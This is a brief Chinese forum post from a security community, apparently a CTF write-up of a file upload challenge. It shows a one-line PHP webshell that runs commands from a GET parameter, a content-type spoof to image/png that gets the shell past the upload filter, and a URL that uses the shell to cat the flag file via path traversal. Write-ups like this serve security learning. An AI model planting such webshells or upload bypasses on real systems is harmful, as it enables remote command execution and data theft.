[分享]签到题逐光启航文件上传漏洞-CTF对抗-看雪-安全社区|安全招聘|kanxue.com

[分享]签到题逐光启航文件上传漏洞

发表于: 2024-8-15 13:57 114

[分享]签到题逐光启航文件上传漏洞

yuzhouheike 活跃值

活跃值

2024-8-15 13:57

114

0x00 队友根据注释的base64 解码得到上传文件的php

0x01 编写一句话木马 yuzhou.php

1	`<?php system($_GET['cmd']); ?>`

0x02 上传的时候Charles抓捕拦截修改文件类型为:image/png 成功上传

0x03 队友通过上传的木马脚本遍历flag文件

···
http://871dc9a5-32d7-4cac-9d01-6f2abaa08845.node.pediy.com:81/upload/yuzhou.php?cmd=cat../../../../flag
···

0x04 最终找到flag

[招生]科锐逆向工程师培训(2024年11月15日实地，远程教学同时开班, 第51期)

收藏・0

免费・0

支持

分享

最新回复 (0)
	游客登录 \| 注册方可回帖回帖表情雪币赚取及消费高级回复

返回

yuzhouheike

发帖

回帖

RANK

他的文章

看雪公众号

专注于PC、移动、智能设备安全研究及逆向工程的开发者社区

//